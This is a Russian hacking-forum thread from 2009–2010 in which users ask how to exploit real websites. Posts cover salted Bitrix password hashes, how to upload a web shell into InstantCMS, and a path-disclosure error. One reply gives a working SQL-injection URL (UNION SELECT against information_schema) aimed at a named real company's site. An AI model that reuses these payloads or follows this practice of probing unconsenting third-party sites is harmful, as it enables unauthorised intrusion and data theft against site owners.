HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.11.2009, 18:59
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307

Репутация: 114
Отправить сообщение для [aywo] с помощью ICQ
По умолчанию

в 7-й версии битрикс использует чистый мд5 (32 символа) а в 8-й версии хеш уже 40 символов, то есть неободимо отбросить ненужные символы (salt) то есть в данном случае хеш будет выглядеть так :
Код:
fb6e1ad1bf85366d9a91b6e43b87f53b
 
Ответить с цитированием

  #2  
Старый 24.11.2009, 23:13
growhel
Новичок
Регистрация: 23.11.2009
Сообщений: 2
Провел на форуме:
9584

Репутация: 0
По умолчанию

http://www.yor_site.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto


возможно что нибудь сделать?
это хотяб бы баг?
 
Ответить с цитированием

  #3  
Старый 25.11.2009, 01:15
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от growhel  
http://www.yor_site.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto


возможно что нибудь сделать?
это хотяб бы баг?
Очень понятно.С помощтю спиритического анализа,и работе с духами могу сказать одно: для подтверждения ваших догадок,необходимо отпубликовать в теме исходный url.тоесть - оригинальный адрес сайта.
 
Ответить с цитированием

  #4  
Старый 25.11.2009, 01:57
growhel
Новичок
Регистрация: 23.11.2009
Сообщений: 2
Провел на форуме:
9584

Репутация: 0
По умолчанию

www.avroragro.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto

оригинал
 
Ответить с цитированием

  #5  
Старый 25.11.2009, 09:21
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от growhel  
www.avroragro.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto

оригинал
Эм
Код:
Ошибка: У Вас нет прав для доступа к этому модулю.
Это никак не уязвимость,просто движок тебе сообщает о вещах насущных.
 
Ответить с цитированием

  #6  
Старый 25.11.2009, 01:06
S[N]EP
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539

Репутация: 53
По умолчанию

кто нибудь знает как залить шел в Instantcms, доступ в админку есть.
 
Ответить с цитированием

  #7  
Старый 03.01.2010, 19:57
FaTRuS
Познающий
Регистрация: 28.08.2006
Сообщений: 94
Провел на форуме:
327555

Репутация: 1
Отправить сообщение для FaTRuS с помощью ICQ
По умолчанию

есть ошибка
Notice: Undefined offset: 0 in /var/www/virtual/bla-bla-bla/htdocs/blocks/content.php on line 40
которая появляется если сделать запрос типа
http://bla-bla-bla/index.php?showmenu=true&id=999999999999999
что можно с этого поиметь???
 
Ответить с цитированием

  #8  
Старый 03.01.2010, 20:39
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от FaTRuS  
есть ошибка
Notice: Undefined offset: 0 in /var/www/virtual/bla-bla-bla/htdocs/blocks/content.php on line 40
которая появляется если сделать запрос типа
http://bla-bla-bla/index.php?showmenu=true&id=999999999999999
что можно с этого поиметь???
Ты уже поимел из нее все что можно,а именно - раскрытие пути.
Выложи ссылочку на хост,посмотрим что еще там можно "поиметь".
 
Ответить с цитированием

  #9  
Старый 03.01.2010, 21:16
FaTRuS
Познающий
Регистрация: 28.08.2006
Сообщений: 94
Провел на форуме:
327555

Репутация: 1
Отправить сообщение для FaTRuS с помощью ICQ
По умолчанию

www.prima-group.kz
 
Ответить с цитированием

  #10  
Старый 03.01.2010, 21:29
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от FaTRuS  
www.prima-group.kz
http://www.prima-group.kz/index.php?lang=en+from+menu%20where%20id=-1+union+select+TABLE_NAME,TABLE_NAME%20from%20info rmation_schema.tables+--+
SQL-inj+inc.Раскрутить не смог.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ